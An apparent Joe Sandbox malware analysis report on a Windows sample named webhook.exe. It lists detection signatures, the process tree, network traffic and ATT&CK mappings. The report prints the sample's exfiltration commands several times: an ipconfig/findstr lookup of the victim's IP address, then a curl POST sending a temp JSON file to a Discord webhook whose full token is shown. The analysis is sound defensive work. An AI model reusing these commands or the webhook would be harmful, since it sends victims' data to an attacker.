Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
webhook.exe

Overview

General Information

Sample name:webhook.exe
Analysis ID:1575685
MD5:5765bde6d3062b30890598996b671db0
SHA1:5b36dcecd5e3ba131fc05973179bffbbec08291d
SHA256:ebc2dba491422a0c420cc22ffe91483fe4885ecfae57baa2ed207252d9afd5de
Tags:exeRedlineStealeruser-lontze7
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Uses ipconfig to lookup or modify the Windows network settings
Binary contains a suspicious time stamp
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found evasive API chain checking for process token information
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains executable resources (Code or Archives)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Recon Command Output Piped To Findstr.EXE
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • webhook.exe (PID: 6476 cmdline: "C:\Users\user\Desktop\webhook.exe" MD5: 5765BDE6D3062B30890598996B671DB0)
    • cmd.exe (PID: 6764 cmdline: cmd /c "webhook.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2336 cmdline: C:\Windows\system32\cmd.exe /c ipconfig | findstr /i "IPv4" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • ipconfig.exe (PID: 1928 cmdline: ipconfig MD5: 62F170FB07FDBB79CEB7147101406EB8)
        • findstr.exe (PID: 2044 cmdline: findstr /i "IPv4" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
      • curl.exe (PID: 3340 cmdline: curl -H "Content-Type: application/json" -d @"C:\Users\user\AppData\Local\Temp\discord_webhook.json" "https://discord.com/api/webhooks/1285980629988802621/qvdwM_2Etcrhfd3BeE7em_7Ki8g5TtL1XpoCOOldpWtkdEpZOLeERx2WW4gv8kmABPXQ" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
  • cleanup
No configs have been found
No yara matches
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\webhook.exe, ProcessId: 6476, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), frack113: Data: Command: C:\Windows\system32\cmd.exe /c ipconfig | findstr /i "IPv4", CommandLine: C:\Windows\system32\cmd.exe /c ipconfig | findstr /i "IPv4", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: cmd /c "webhook.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6764, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c ipconfig | findstr /i "IPv4", ProcessId: 2336, ProcessName: cmd.exe
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: curl -H "Content-Type: application/json" -d @"C:\Users\user\AppData\Local\Temp\discord_webhook.json" "https://discord.com/api/webhooks/1285980629988802621/qvdwM_2Etcrhfd3BeE7em_7Ki8g5TtL1XpoCOOldpWtkdEpZOLeERx2WW4gv8kmABPXQ", CommandLine: curl -H "Content-Type: application/json" -d @"C:\Users\user\AppData\Local\Temp\discord_webhook.json" "https://discord.com/api/webhooks/1285980629988802621/qvdwM_2Etcrhfd3BeE7em_7Ki8g5TtL1XpoCOOldpWtkdEpZOLeERx2WW4gv8kmABPXQ", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\curl.exe, NewProcessName: C:\Windows\System32\curl.exe, OriginalFileName: C:\Windows\System32\curl.exe, ParentCommandLine: cmd /c "webhook.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6764, ParentProcessName: cmd.exe, ProcessCommandLine: curl -H "Content-Type: application/json" -d @"C:\Users\user\AppData\Local\Temp\discord_webhook.json" "https://discord.com/api/webhooks/1285980629988802621/qvdwM_2Etcrhfd3BeE7em_7Ki8g5TtL1XpoCOOldpWtkdEpZOLeERx2WW4gv8kmABPXQ", ProcessId: 3340, ProcessName: curl.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: webhook.exeVirustotal: Detection: 11%Perma Link
Source: C:\Users\user\Desktop\webhook.exeCode function: 0_2_00007FF6505446E8 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF6505446E8
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: webhook.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: wextract.pdb source: webhook.exe
Source: Binary string: wextract.pdbGCTL source: webhook.exe
Source: C:\Users\user\Desktop\webhook.exeCode function: 0_2_00007FF6505426B8 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF6505426B8
Source: Joe Sandbox ViewIP Address: 162.159.138.232 162.159.138.232
Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: discord.com
Source: unknownHTTP traffic detected: POST /api/webhooks/1285980629988802621/qvdwM_2Etcrhfd3BeE7em_7Ki8g5TtL1XpoCOOldpWtkdEpZOLeERx2WW4gv8kmABPXQ HTTP/1.1Host: discord.comUser-Agent: curl/7.83.1Accept: */*Content-Type: application/jsonContent-Length: 57
Source: curl.exe, 00000006.00000003.1800142833.0000029D6A88A000.00000004.00000020.00020000.00000000.sdmp, webhook.bat.0.drString found in binary or memory: https://discord.com/api/webhooks/1285980629988802621/qvdwM_2Etcrhfd3BeE7em_7Ki8g5TtL1XpoCOOldpWtkdEp
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: C:\Users\user\Desktop\webhook.exeCode function: 0_2_00007FF650547FE4 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF650547FE4
Source: C:\Users\user\Desktop\webhook.exeCode function: 0_2_00007FF6505433BC GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF6505433BC
Source: C:\Users\user\Desktop\webhook.exeCode function: 0_2_00007FF650545B500_2_00007FF650545B50
Source: C:\Users\user\Desktop\webhook.exeCode function: 0_2_00007FF65054521C0_2_00007FF65054521C
Source: C:\Users\user\Desktop\webhook.exeCode function: 0_2_00007FF65054721C0_2_00007FF65054721C
Source: C:\Users\user\Desktop\webhook.exeCode function: 0_2_00007FF650541A080_2_00007FF650541A08
Source: C:\Users\user\Desktop\webhook.exeCode function: 0_2_00007FF6505458100_2_00007FF650545810
Source: C:\Users\user\Desktop\webhook.exeCode function: 0_2_00007FF650544BE00_2_00007FF650544BE0
Source: C:\Users\user\Desktop\webhook.exeCode function: 0_2_00007FF6505478AE0_2_00007FF6505478AE
Source: C:\Users\user\Desktop\webhook.exeCode function: 0_2_00007FF650544BDE0_2_00007FF650544BDE
Source: C:\Users\user\Desktop\webhook.exeCode function: 0_2_00007FF6505433BC0_2_00007FF6505433BC
Source: webhook.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 730 bytes, 1 file, at 0x2c +A "webhook.bat", ID 1108, number 1, 1 datablock, 0x1503 compression
Source: webhook.exeBinary or memory string: OriginalFilename vs webhook.exe
Source: webhook.exe, 00000000.00000000.1768842974.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs webhook.exe
Source: webhook.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs webhook.exe
Source: classification engineClassification label: mal52.winEXE@12/2@1/2
Source: C:\Users\user\Desktop\webhook.exeCode function: 0_2_00007FF650545B50 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_00007FF650545B50
Source: C:\Users\user\Desktop\webhook.exeCode function: 0_2_00007FF6505433BC GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF6505433BC
Source: C:\Users\user\Desktop\webhook.exeCode function: 0_2_00007FF650545B50 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_00007FF650545B50
Source: C:\Users\user\Desktop\webhook.exeCode function: 0_2_00007FF650545140 FindResourceExA,SizeofResource,FindResourceA,LoadResource,LockResource,memcpy_s,FreeResource,0_2_00007FF650545140
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1612:120:WilError_03
Source: C:\Users\user\Desktop\webhook.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMPJump to behavior
Source: C:\Users\user\Desktop\webhook.exeProcess created: C:\Windows\System32\cmd.exe cmd /c "webhook.bat"
Source: webhook.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\webhook.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: webhook.exeVirustotal: Detection: 11%
Source: unknownProcess created: C:\Users\user\Desktop\webhook.exe "C:\Users\user\Desktop\webhook.exe"
Source: C:\Users\user\Desktop\webhook.exeProcess created: C:\Windows\System32\cmd.exe cmd /c "webhook.bat"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ipconfig | findstr /i "IPv4"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "IPv4"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -H "Content-Type: application/json" -d @"C:\Users\user\AppData\Local\Temp\discord_webhook.json" "https://discord.com/api/webhooks/1285980629988802621/qvdwM_2Etcrhfd3BeE7em_7Ki8g5TtL1XpoCOOldpWtkdEpZOLeERx2WW4gv8kmABPXQ"
Source: C:\Users\user\Desktop\webhook.exeProcess created: C:\Windows\System32\cmd.exe cmd /c "webhook.bat"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ipconfig | findstr /i "IPv4"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -H "Content-Type: application/json" -d @"C:\Users\user\AppData\Local\Temp\discord_webhook.json" "https://discord.com/api/webhooks/1285980629988802621/qvdwM_2Etcrhfd3BeE7em_7Ki8g5TtL1XpoCOOldpWtkdEpZOLeERx2WW4gv8kmABPXQ"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfigJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "IPv4"Jump to behavior
Source: C:\Users\user\Desktop\webhook.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Users\user\Desktop\webhook.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\webhook.exeSection loaded: feclient.dllJump to behavior
Source: C:\Users\user\Desktop\webhook.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\webhook.exeSection loaded: advpack.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dllJump to behavior
Source: webhook.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: webhook.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: webhook.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: webhook.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: webhook.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: webhook.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: webhook.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: webhook.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: webhook.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wextract.pdb source: webhook.exe
Source: Binary string: wextract.pdbGCTL source: webhook.exe
Source: webhook.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: webhook.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: webhook.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: webhook.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: webhook.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: webhook.exeStatic PE information: 0xD97FD45F [Sun Aug 19 04:21:51 2085 UTC]
Source: C:\Users\user\Desktop\webhook.exeCode function: 0_2_00007FF650541A08 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00007FF650541A08

Persistence and Installation Behavior

barindex
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig
Source: C:\Users\user\Desktop\webhook.exeCode function: 0_2_00007FF650541D28 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00007FF650541D28
Source: C:\Users\user\Desktop\webhook.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
Source: C:\Users\user\Desktop\webhook.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
Source: C:\Users\user\Desktop\webhook.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
Source: C:\Users\user\Desktop\webhook.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\webhook.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2516
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\webhook.exeCode function: 0_2_00007FF6505426B8 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF6505426B8
Source: C:\Users\user\Desktop\webhook.exeCode function: 0_2_00007FF6505441EC GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00007FF6505441EC
Source: curl.exe, 00000006.00000003.1800196203.0000029D6A865000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\webhook.exeCode function: 0_2_00007FF650541A08 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00007FF650541A08
Source: C:\Users\user\Desktop\webhook.exeCode function: 0_2_00007FF650541404 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF650541404
Source: C:\Users\user\Desktop\webhook.exeCode function: 0_2_00007FF65054170E SetUnhandledExceptionFilter,0_2_00007FF65054170E
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ipconfig | findstr /i "IPv4"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -H "Content-Type: application/json" -d @"C:\Users\user\AppData\Local\Temp\discord_webhook.json" "https://discord.com/api/webhooks/1285980629988802621/qvdwM_2Etcrhfd3BeE7em_7Ki8g5TtL1XpoCOOldpWtkdEpZOLeERx2WW4gv8kmABPXQ"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfigJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "IPv4"Jump to behavior
Source: C:\Users\user\Desktop\webhook.exeCode function: 0_2_00007FF650542590 LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary,0_2_00007FF650542590
Source: C:\Users\user\Desktop\webhook.exeCode function: 0_2_00007FF6505418E4 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,0_2_00007FF6505418E4
Source: C:\Users\user\Desktop\webhook.exeCode function: 0_2_00007FF650547FE4 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF650547FE4
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts2
Native API
1
Scripting
1
Access Token Manipulation
1
Access Token Manipulation
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
21
Encrypted Channel
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
11
Process Injection
11
Process Injection
LSASS Memory1
Security Software Discovery
Remote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
DLL Side-Loading
1
Registry Run Keys / Startup Folder
1
Timestomp
Security Account Manager1
System Network Configuration Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
DLL Side-Loading
1
DLL Side-Loading
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets5
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1575685 Sample: webhook.exe Startdate: 16/12/2024 Architecture: WINDOWS Score: 52 29 discord.com 2->29 31 Multi AV Scanner detection for submitted file 2->31 9 webhook.exe 1 3 2->9         started        signatures3 process4 process5 11 cmd.exe 2 9->11         started        signatures6 33 Uses ipconfig to lookup or modify the Windows network settings 11->33 14 cmd.exe 1 11->14         started        16 curl.exe 1 11->16         started        19 conhost.exe 11->19         started        process7 dnsIp8 21 ipconfig.exe 1 14->21         started        23 findstr.exe 1 14->23         started        25 discord.com 162.159.138.232, 443, 49734 CLOUDFLARENETUS United States 16->25 27 127.0.0.1 unknown unknown 16->27 process9

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
webhook.exe5%ReversingLabs
webhook.exe11%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
discord.com
162.159.138.232
truefalse
    high
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    162.159.138.232
    discord.comUnited States
    13335CLOUDFLARENETUSfalse
    IP
    127.0.0.1
    Joe Sandbox version:41.0.0 Charoite
    Analysis ID:1575685
    Start date and time:2024-12-16 08:29:07 +01:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 2m 22s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:7
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:webhook.exe
    Detection:MAL
    Classification:mal52.winEXE@12/2@1/2
    EGA Information:
    • Successful, ratio: 100%
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 27
    • Number of non-executed functions: 31
    Cookbook Comments:
    • Found application associated with file extension: .exe
    • Stop behavior analysis, all processes terminated
    • Not all processes where analyzed, report is missing behavior information
    No simulations
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    162.159.138.232chos.exeGet hashmaliciousUnknownBrowse
      apDMcnqqWs.exeGet hashmaliciousUnknownBrowse
        Cooperative Agreement0000800380.docx.exeGet hashmaliciousBabadeda, Blank GrabberBrowse
          speedymaqing.exeGet hashmaliciousPython Stealer, Discord Token StealerBrowse
            RuntimeusererVers.exeGet hashmaliciousPython StealerBrowse
              file.exeGet hashmaliciousCStealerBrowse
                dens.exeGet hashmaliciousPython Stealer, Exela Stealer, Waltuhium GrabberBrowse
                  yuki.exeGet hashmaliciousLuna StealerBrowse
                    file.exeGet hashmaliciousGrowtopiaBrowse
                      SecuriteInfo.com.Win64.Malware-gen.13500.20938.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        discord.comzapret.exeGet hashmaliciousUnknownBrowse
                        • 162.159.136.232
                        Bloxflip Predictor.exeGet hashmaliciousNjratBrowse
                        • 162.159.137.232
                        chos.exeGet hashmaliciousUnknownBrowse
                        • 162.159.138.232
                        phost.exeGet hashmaliciousBlank GrabberBrowse
                        • 162.159.137.232
                        ihost.exeGet hashmaliciousPython Stealer, Muck StealerBrowse
                        • 162.159.136.232
                        shost.exeGet hashmaliciousPython Stealer, Muck StealerBrowse
                        • 162.159.136.232
                        sppawx.exeGet hashmaliciousBlank GrabberBrowse
                        • 162.159.135.232
                        ahost.exeGet hashmaliciousBlank GrabberBrowse
                        • 162.159.135.232
                        wsapx.exeGet hashmaliciousBlank GrabberBrowse
                        • 162.159.136.232
                        WE8zqotCFj.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                        • 162.159.137.232
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        CLOUDFLARENETUSgivenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                        • 104.21.84.67
                        clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                        • 172.67.187.200
                        https://zde.soundestlink.com/ce/c/675fab7ba82aca38b8d991e6/675fabf585cd17d1e3e2bb78/675fac13057112d43b540576?signature=da009f44f7cd45aeae4fbb5addf15ac91fbf725bb5e9405183f25bf1db8c8baaGet hashmaliciousUnknownBrowse
                        • 104.26.10.61
                        https://keepsmiling.co.in/front/indexxxx.html?em=NT43NUs6MllJO0ZdVTkzKSA8NzlDOkcgTjhWXU0=Get hashmaliciousUnknownBrowse
                        • 104.21.89.91
                        file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                        • 104.21.79.7
                        http://18.224.21.137/FFmnpShhHMMWeIqsVa2rJ69xinQlZ-7450Get hashmaliciousUnknownBrowse
                        • 172.67.41.229
                        1.elfGet hashmaliciousUnknownBrowse
                        • 1.8.62.108
                        file.exeGet hashmaliciousAmadey, LummaC Stealer, Vidar, XmrigBrowse
                        • 104.21.79.7
                        Setup.msiGet hashmaliciousVidarBrowse
                        • 104.21.52.25
                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                        • 172.67.164.37
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        74954a0c86284d0d6e1c4efefe92b521loader.exeGet hashmaliciousUnknownBrowse
                        • 162.159.138.232
                        loader.exeGet hashmaliciousUnknownBrowse
                        • 162.159.138.232
                        chos.exeGet hashmaliciousUnknownBrowse
                        • 162.159.138.232
                        file.exeGet hashmaliciousUnknownBrowse
                        • 162.159.138.232
                        yiDQb6GkBq.exeGet hashmaliciousAmadey, LummaC Stealer, VidarBrowse
                        • 162.159.138.232
                        Document.lnk.download.lnkGet hashmaliciousUnknownBrowse
                        • 162.159.138.232
                        aLsxeH29P2.exeGet hashmaliciousUnknownBrowse
                        • 162.159.138.232
                        c9a6BV0eQO.exeGet hashmaliciousUnknownBrowse
                        • 162.159.138.232
                        dYUteuvmHn.exeGet hashmaliciousUnknownBrowse
                        • 162.159.138.232
                        new.ini.ps1Get hashmaliciousUnknownBrowse
                        • 162.159.138.232
                        No context
                        Process:C:\Users\user\Desktop\webhook.exe
                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1040
                        Entropy (8bit):5.237069171825323
                        Encrypted:false
                        SSDEEP:24:wEzHn8moNE/ipwBpy7Li1Yro5nyeGxq2GNC/HKlP:NH8moqaGbyni1YMgHq2cCPe
                        MD5:55FDC03CE6D4C46489CA4DB903729D1C
                        SHA1:97D9343B85C6310C975D9825DB1C7D905E5EBBA3
                        SHA-256:D792224465EA5564F3698F05936E60A24551F51251FE4DD820919639F4586990
                        SHA-512:807E52DF55A1654E4B7E33BEC557887B6C471437574E196267699AB6908808E6DCB78016B3C0B5D97E7730E0D6C56BFA3BB39BC82FE06BB2D50E1D81D3023D58
                        Malicious:false
